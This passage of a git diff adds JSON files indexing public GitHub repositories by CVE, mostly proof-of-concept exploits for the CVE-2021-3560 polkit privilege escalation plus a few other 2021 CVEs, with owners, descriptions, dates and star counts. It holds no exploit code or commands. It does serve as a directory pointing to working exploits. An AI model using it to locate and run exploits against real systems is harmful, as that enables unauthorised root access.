+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3560",
+ "exploits",
+ "poc",
+ "polkit",
+ "privilege-escalation"
+ ],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 77,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 376208961,
+ "name": "CVE-2021-3560",
+ "full_name": "hakivvi\/CVE-2021-3560",
+ "owner": {
+ "login": "hakivvi",
+ "id": 67718634,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67718634?v=4",
+ "html_url": "https:\/\/github.com\/hakivvi"
+ },
+ "html_url": "https:\/\/github.com\/hakivvi\/CVE-2021-3560",
+ "description": "a reliable C based exploit and writeup for CVE-2021-3560.",
+ "fork": false,
+ "created_at": "2021-06-12T05:22:35Z",
+ "updated_at": "2023-09-28T11:28:36Z",
+ "pushed_at": "2021-06-23T11:07:32Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "c",
+ "cve-2021-3560"
+ ],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 376695409,
+ "name": "CVE-2021-3560_PoC",
+ "full_name": "iSTAR-Lab\/CVE-2021-3560_PoC",
+ "owner": {
+ "login": "iSTAR-Lab",
+ "id": 86260908,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86260908?v=4",
+ "html_url": "https:\/\/github.com\/iSTAR-Lab"
+ },
+ "html_url": "https:\/\/github.com\/iSTAR-Lab\/CVE-2021-3560_PoC",
+ "description": "polkit exploit script v1.0",
+ "fork": false,
+ "created_at": "2021-06-14T03:45:38Z",
+ "updated_at": "2021-07-02T18:28:41Z",
+ "pushed_at": "2021-06-14T18:06:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 376943596,
+ "name": "CVE-2021-3560-Polkit-Privilege-Esclation",
+ "full_name": "secnigma\/CVE-2021-3560-Polkit-Privilege-Esclation",
+ "owner": {
+ "login": "secnigma",
+ "id": 78214540,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78214540?v=4",
+ "html_url": "https:\/\/github.com\/secnigma"
+ },
+ "html_url": "https:\/\/github.com\/secnigma\/CVE-2021-3560-Polkit-Privilege-Esclation",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-14T20:08:20Z",
+ "updated_at": "2024-06-20T14:27:57Z",
+ "pushed_at": "2022-11-16T13:14:56Z",
+ "stargazers_count": 108,
+ "watchers_count": 108,
+ "has_discussions": false,
+ "forks_count": 52,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 52,
+ "watchers": 108,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 377076931,
+ "name": "CVE-2021-3560",
+ "full_name": "curtishoughton\/CVE-2021-3560",
+ "owner": {
+ "login": "curtishoughton",
+ "id": 47698784,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47698784?v=4",
+ "html_url": "https:\/\/github.com\/curtishoughton"
+ },
+ "html_url": "https:\/\/github.com\/curtishoughton\/CVE-2021-3560",
+ "description": "Polkit - Local Privilege Escalation (CVE-2021-3560)",
+ "fork": false,
+ "created_at": "2021-06-15T07:37:15Z",
+ "updated_at": "2021-07-26T07:06:22Z",
+ "pushed_at": "2021-06-14T14:54:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 378360079,
+ "name": "Polkit-exploit",
+ "full_name": "Almorabea\/Polkit-exploit",
+ "owner": {
+ "login": "Almorabea",
+ "id": 13198863,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13198863?v=4",
+ "html_url": "https:\/\/github.com\/Almorabea"
+ },
+ "html_url": "https:\/\/github.com\/Almorabea\/Polkit-exploit",
+ "description": "Privilege escalation with polkit - CVE-2021-3560",
+ "fork": false,
+ "created_at": "2021-06-19T08:15:17Z",
+ "updated_at": "2024-04-03T04:00:06Z",
+ "pushed_at": "2021-06-20T07:38:13Z",
+ "stargazers_count": 117,
+ "watchers_count": 117,
+ "has_discussions": false,
+ "forks_count": 53,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 53,
+ "watchers": 117,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 381492885,
+ "name": "Polkit-CVE-2021-3560",
+ "full_name": "AssassinUKG\/Polkit-CVE-2021-3560",
+ "owner": {
+ "login": "AssassinUKG",
+ "id": 5285547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4",
+ "html_url": "https:\/\/github.com\/AssassinUKG"
+ },
+ "html_url": "https:\/\/github.com\/AssassinUKG\/Polkit-CVE-2021-3560",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-29T20:47:16Z",
+ "updated_at": "2023-11-03T08:10:49Z",
+ "pushed_at": "2021-06-29T21:09:41Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 382305236,
+ "name": "CVE-2021-3560",
+ "full_name": "cpu0x00\/CVE-2021-3560",
+ "owner": {
+ "login": "cpu0x00",
+ "id": 86830248,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86830248?v=4",
+ "html_url": "https:\/\/github.com\/cpu0x00"
+ },
+ "html_url": "https:\/\/github.com\/cpu0x00\/CVE-2021-3560",
+ "description": "ubuntu new PrivEsc race condition vulnerability",
+ "fork": false,
+ "created_at": "2021-07-02T10:03:26Z",
+ "updated_at": "2022-11-19T21:44:24Z",
+ "pushed_at": "2021-08-05T02:07:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 390233864,
+ "name": "CVE-2021-3560",
+ "full_name": "BizarreLove\/CVE-2021-3560",
+ "owner": {
+ "login": "BizarreLove",
+ "id": 41328139,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41328139?v=4",
+ "html_url": "https:\/\/github.com\/BizarreLove"
+ },
+ "html_url": "https:\/\/github.com\/BizarreLove\/CVE-2021-3560",
+ "description": "NYCY_homework_&_meeting",
+ "fork": false,
+ "created_at": "2021-07-28T06:05:46Z",
+ "updated_at": "2021-07-29T08:24:46Z",
+ "pushed_at": "2021-07-29T08:24:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 391043530,
+ "name": "CVE-2021-3560",
+ "full_name": "0dayNinja\/CVE-2021-3560",
+ "owner": {
+ "login": "0dayNinja",
+ "id": 88158703,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88158703?v=4",
+ "html_url": "https:\/\/github.com\/0dayNinja"
+ },
+ "html_url": "https:\/\/github.com\/0dayNinja\/CVE-2021-3560",
+ "description": "Polkit D-Bus Authentication Bypass Exploit",
+ "fork": false,
+ "created_at": "2021-07-30T11:41:34Z",
+ "updated_at": "2023-11-20T08:19:39Z",
+ "pushed_at": "2021-07-30T11:43:32Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 427315131,
+ "name": "CVE-2021-3560",
+ "full_name": "TomMalvoRiddle\/CVE-2021-3560",
+ "owner": {
+ "login": "TomMalvoRiddle",
+ "id": 64571518,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64571518?v=4",
+ "html_url": "https:\/\/github.com\/TomMalvoRiddle"
+ },
+ "html_url": "https:\/\/github.com\/TomMalvoRiddle\/CVE-2021-3560",
+ "description": "CVE-2021-3560 (Polkit - Local Privilege Escalation)",
+ "fork": false,
+ "created_at": "2021-11-12T10:15:45Z",
+ "updated_at": "2021-12-21T14:39:48Z",
+ "pushed_at": "2021-07-26T07:08:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 453938064,
+ "name": "CVE-2021-3560",
+ "full_name": "chenaotian\/CVE-2021-3560",
+ "owner": {
+ "login": "chenaotian",
+ "id": 86546351,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4",
+ "html_url": "https:\/\/github.com\/chenaotian"
+ },
+ "html_url": "https:\/\/github.com\/chenaotian\/CVE-2021-3560",
+ "description": "CVE-2021-3560 analysis",
+ "fork": false,
+ "created_at": "2022-01-31T09:02:23Z",
+ "updated_at": "2023-03-05T11:58:45Z",
+ "pushed_at": "2022-05-23T02:23:38Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 454864474,
+ "name": "CVE-2021-3560",
+ "full_name": "NeonWhiteRabbit\/CVE-2021-3560",
+ "owner": {
+ "login": "NeonWhiteRabbit",
+ "id": 97998625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97998625?v=4",
+ "html_url": "https:\/\/github.com\/NeonWhiteRabbit"
+ },
+ "html_url": "https:\/\/github.com\/NeonWhiteRabbit\/CVE-2021-3560",
+ "description": "Polkit Exploit (CVE-2021-3560), no download capabilty? Copy and paste it!",
+ "fork": false,
+ "created_at": "2022-02-02T17:08:24Z",
+ "updated_at": "2023-03-24T03:48:31Z",
+ "pushed_at": "2022-02-02T18:07:05Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 458772805,
+ "name": "CVE-2021-3560-Polkit-DBus",
+ "full_name": "f4T1H21\/CVE-2021-3560-Polkit-DBus",
+ "owner": {
+ "login": "f4T1H21",
+ "id": 83399767,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83399767?v=4",
+ "html_url": "https:\/\/github.com\/f4T1H21"
+ },
+ "html_url": "https:\/\/github.com\/f4T1H21\/CVE-2021-3560-Polkit-DBus",
+ "description": "f4T1H's PoC script for CVE-2021-3560 Polkit D-Bus Privilege Escalation",
+ "fork": false,
+ "created_at": "2022-02-13T10:12:51Z",
+ "updated_at": "2024-02-24T11:42:39Z",
+ "pushed_at": "2022-02-13T11:16:06Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3560",
+ "dbus",
+ "exploit",
+ "linux",
+ "polkit",
+ "privilege-escalation"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 463667394,
+ "name": "CVE-2021-3560",
+ "full_name": "innxrmxst\/CVE-2021-3560",
+ "owner": {
+ "login": "innxrmxst",
+ "id": 43517528,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43517528?v=4",
+ "html_url": "https:\/\/github.com\/innxrmxst"
+ },
+ "html_url": "https:\/\/github.com\/innxrmxst\/CVE-2021-3560",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-25T20:30:31Z",
+ "updated_at": "2022-11-19T21:44:18Z",
+ "pushed_at": "2022-02-25T20:31:03Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 487080832,
+ "name": "CVE-2021-3560-Authentication-Agent",
+ "full_name": "RicterZ\/CVE-2021-3560-Authentication-Agent",
+ "owner": {
+ "login": "RicterZ",
+ "id": 5282759,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5282759?v=4",
+ "html_url": "https:\/\/github.com\/RicterZ"
+ },
+ "html_url": "https:\/\/github.com\/RicterZ\/CVE-2021-3560-Authentication-Agent",
+ "description": "PolicyKit CVE-2021-3560 Exploit (Authentication Agent)",
+ "fork": false,
+ "created_at": "2022-04-29T18:57:30Z",
+ "updated_at": "2024-06-14T04:51:36Z",
+ "pushed_at": "2022-05-02T07:49:01Z",
+ "stargazers_count": 113,
+ "watchers_count": 113,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 113,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 487194704,
+ "name": "CVE-2021-3560",
+ "full_name": "WinMin\/CVE-2021-3560",
+ "owner": {
+ "login": "WinMin",
+ "id": 18380453,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18380453?v=4",
+ "html_url": "https:\/\/github.com\/WinMin"
+ },
+ "html_url": "https:\/\/github.com\/WinMin\/CVE-2021-3560",
+ "description": "PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)",
+ "fork": false,
+ "created_at": "2022-04-30T05:53:45Z",
+ "updated_at": "2023-09-28T11:38:26Z",
+ "pushed_at": "2023-03-06T05:22:36Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 488025652,
+ "name": "exploit-CVE-2021-3560",
+ "full_name": "UNICORDev\/exploit-CVE-2021-3560",
+ "owner": {
+ "login": "UNICORDev",
+ "id": 103281826,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103281826?v=4",
+ "html_url": "https:\/\/github.com\/UNICORDev"
+ },
+ "html_url": "https:\/\/github.com\/UNICORDev\/exploit-CVE-2021-3560",
+ "description": "Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation",
+ "fork": false,
+ "created_at": "2022-05-02T23:56:31Z",
+ "updated_at": "2024-02-19T06:22:46Z",
+ "pushed_at": "2022-06-26T16:26:27Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3560",
+ "exploit",
+ "hackthebox",
+ "linux",
+ "penetration-testing",
+ "polkit",
+ "proof-of-concept",
+ "python",
+ "unicord",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 664478569,
+ "name": "CVE-2021-3560",
+ "full_name": "asepsaepdin\/CVE-2021-3560",
+ "owner": {
+ "login": "asepsaepdin",
+ "id": 122620685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4",
+ "html_url": "https:\/\/github.com\/asepsaepdin"
+ },
+ "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-3560",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-10T04:26:13Z",
+ "updated_at": "2023-07-10T04:29:22Z",
+ "pushed_at": "2023-09-05T14:48:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 680828510,
+ "name": "ROOT-CVE-2021-3560",
+ "full_name": "pashayogi\/ROOT-CVE-2021-3560",
+ "owner": {
+ "login": "pashayogi",
+ "id": 50790111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4",
+ "html_url": "https:\/\/github.com\/pashayogi"
+ },
+ "html_url": "https:\/\/github.com\/pashayogi\/ROOT-CVE-2021-3560",
+ "description": "Polkit 0.105-26 0.117-2 - Local Privilege Escalation",
+ "fork": false,
+ "created_at": "2023-08-20T14:39:19Z",
+ "updated_at": "2023-08-20T14:39:43Z",
+ "pushed_at": "2023-08-20T14:39:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 701416179,
+ "name": "CVE-2021-3560",
+ "full_name": "TieuLong21Prosper\/CVE-2021-3560",
+ "owner": {
+ "login": "TieuLong21Prosper",
+ "id": 128500598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128500598?v=4",
+ "html_url": "https:\/\/github.com\/TieuLong21Prosper"
+ },
+ "html_url": "https:\/\/github.com\/TieuLong21Prosper\/CVE-2021-3560",
+ "description": "CVE-2021-3560 Bypass su - root",
+ "fork": false,
+ "created_at": "2023-10-06T15:27:13Z",
+ "updated_at": "2023-10-06T15:34:33Z",
+ "pushed_at": "2023-10-10T18:46:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 715920193,
+ "name": "CVE-2021-3560",
+ "full_name": "LucasPDiniz\/CVE-2021-3560",
+ "owner": {
+ "login": "LucasPDiniz",
+ "id": 57265360,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4",
+ "html_url": "https:\/\/github.com\/LucasPDiniz"
+ },
+ "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2021-3560",
+ "description": "Exploitation of the CVE-2021-3560 polkit vulnerability",
+ "fork": false,
+ "created_at": "2023-11-08T05:11:56Z",
+ "updated_at": "2023-11-08T05:17:25Z",
+ "pushed_at": "2023-11-08T05:15:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-3560",
+ "poc",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 731859599,
+ "name": "CVE-2021-3560-Polkit-Privilege-Escalation",
+ "full_name": "markyu0401\/CVE-2021-3560-Polkit-Privilege-Escalation",
+ "owner": {
+ "login": "markyu0401",
+ "id": 60618569,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60618569?v=4",
+ "html_url": "https:\/\/github.com\/markyu0401"
+ },
+ "html_url": "https:\/\/github.com\/markyu0401\/CVE-2021-3560-Polkit-Privilege-Escalation",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-15T03:38:41Z",
+ "updated_at": "2024-02-24T04:41:27Z",
+ "pushed_at": "2024-02-24T05:01:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 776748749,
+ "name": "CVE-2021-3560-EXPLOIT",
+ "full_name": "Kyyomaa\/CVE-2021-3560-EXPLOIT",
+ "owner": {
+ "login": "Kyyomaa",
+ "id": 123502260,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123502260?v=4",
+ "html_url": "https:\/\/github.com\/Kyyomaa"
+ },
+ "html_url": "https:\/\/github.com\/Kyyomaa\/CVE-2021-3560-EXPLOIT",
+ "description": "Part of my cybersecurity thesis consists in exploring and exploiting this vulnerability.",
+ "fork": false,
+ "created_at": "2024-03-24T11:37:18Z",
+ "updated_at": "2024-06-16T12:24:02Z",
+ "pushed_at": "2024-04-23T11:02:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35616.json b/2021/CVE-2021-35616.json
new file mode 100644
index 0000000000..8e902d5a3e
--- /dev/null
+++ b/2021/CVE-2021-35616.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 434604239,
+ "name": "OracleOTM",
+ "full_name": "Ofirhamam\/OracleOTM",
+ "owner": {
+ "login": "Ofirhamam",
+ "id": 71285065,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71285065?v=4",
+ "html_url": "https:\/\/github.com\/Ofirhamam"
+ },
+ "html_url": "https:\/\/github.com\/Ofirhamam\/OracleOTM",
+ "description": "Python tool for exploiting CVE-2021-35616 ",
+ "fork": false,
+ "created_at": "2021-12-03T13:22:19Z",
+ "updated_at": "2022-12-06T09:43:34Z",
+ "pushed_at": "2021-12-03T14:00:10Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3572.json b/2021/CVE-2021-3572.json
new file mode 100644
index 0000000000..1c1c9780ba
--- /dev/null
+++ b/2021/CVE-2021-3572.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 374593523,
+ "name": "CVE-2021-3572",
+ "full_name": "frenzymadness\/CVE-2021-3572",
+ "owner": {
+ "login": "frenzymadness",
+ "id": 5688939,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5688939?v=4",
+ "html_url": "https:\/\/github.com\/frenzymadness"
+ },
+ "html_url": "https:\/\/github.com\/frenzymadness\/CVE-2021-3572",
+ "description": "A simple repository helping to test CVE-2021-3572 in PyPA\/pip",
+ "fork": false,
+ "created_at": "2021-06-07T08:36:47Z",
+ "updated_at": "2021-06-07T09:47:13Z",
+ "pushed_at": "2021-06-07T09:04:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35956.json b/2021/CVE-2021-35956.json
new file mode 100644
index 0000000000..2cd55990b8
--- /dev/null
+++ b/2021/CVE-2021-35956.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 382029870,
+ "name": "CVE-2021-35956",
+ "full_name": "tcbutler320\/CVE-2021-35956",
+ "owner": {
+ "login": "tcbutler320",
+ "id": 41709108,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709108?v=4",
+ "html_url": "https:\/\/github.com\/tcbutler320"
+ },
+ "html_url": "https:\/\/github.com\/tcbutler320\/CVE-2021-35956",
+ "description": "Proof of Concept Exploit for CVE-2021-35956, AKCP sensorProbe - 'Multiple' Cross Site Scripting (XSS)",
+ "fork": false,
+ "created_at": "2021-07-01T12:44:05Z",
+ "updated_at": "2021-07-02T03:55:56Z",
+ "pushed_at": "2021-07-01T12:46:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-35956",
+ "exploit",
+ "exploit-code",
+ "exploit-db",
+ "proof-of-concept"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35958.json b/2021/CVE-2021-35958.json
new file mode 100644
index 0000000000..96ee86695c
--- /dev/null
+++ b/2021/CVE-2021-35958.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 786354596,
+ "name": "CVE-2021-35958-2",
+ "full_name": "miguelc49\/CVE-2021-35958-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-35958-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:38:44Z",
+ "updated_at": "2024-04-14T17:38:46Z",
+ "pushed_at": "2024-04-14T17:38:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786354604,
+ "name": "CVE-2021-35958-1",
+ "full_name": "miguelc49\/CVE-2021-35958-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-35958-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:38:47Z",
+ "updated_at": "2024-04-14T17:38:42Z",
+ "pushed_at": "2024-04-14T17:38:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-35975.json b/2021/CVE-2021-35975.json
new file mode 100644
index 0000000000..228ff449d1
--- /dev/null
+++ b/2021/CVE-2021-35975.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719948197,
+ "name": "CVE-2021-35975",
+ "full_name": "fbkcs\/CVE-2021-35975",
+ "owner": {
+ "login": "fbkcs",
+ "id": 44971422,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44971422?v=4",
+ "html_url": "https:\/\/github.com\/fbkcs"
+ },
+ "html_url": "https:\/\/github.com\/fbkcs\/CVE-2021-35975",
+ "description": "Path Traversal Vulnerability in Systematica SMTP Adapter and other sub-products",
+ "fork": false,
+ "created_at": "2023-11-17T08:47:20Z",
+ "updated_at": "2023-11-17T08:47:21Z",
+ "pushed_at": "2023-11-17T09:10:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
